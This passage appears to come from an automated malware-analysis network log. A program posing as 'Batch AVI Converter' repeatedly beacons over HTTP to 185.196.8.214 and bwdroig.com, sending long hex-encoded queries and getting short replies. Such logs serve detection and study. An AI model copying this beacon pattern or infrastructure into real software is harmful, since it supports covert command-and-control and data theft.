    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:24.913373947 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49725 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:25.038696051 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:25.760459900 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:25.875525951 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:26.218106985 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:26.328850031 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:26.568453074 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49726 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:26.698498011 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:27.422672987 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:27.533900023 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:27.778727055 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:27.889357090 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:28.137547016 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:28.250528097 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:28.493657112 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49727 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:28.615607023 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:29.319762945 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49728 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:29.441644907 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:30.164091110 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49729 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:30.287338972 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:31.117788076 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49730 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:31.240688086 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:31.960966110 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49731 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:32.082981110 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:33.084676027 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49732 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:33.207740068 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:33.902400017 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:34.016259909 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:34.288535118 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49733 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:34.411134005 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:35.098615885 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49734 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:35.223618984 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:35.918203115 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:36.030136108 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:36.274380922 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49735 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:36.394933939 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:37.246777058 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:37.358622074 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:37.594295979 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:37.702301025 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:37.939866066 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49736 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:38.068643093 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:38.788089991 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49737 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:38.912429094 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:39.632658958 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49738 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:39.757965088 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:40.485228062 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:40.594259024 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:40.839402914 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:40.952760935 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:41.199531078 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:41.313968897 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:41.796288013 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:41.907008886 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:42.152395964 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:42.268094063 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
Host: bwdroig.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:42.687093019 CEST | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 11 Sep 2024 19:06:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
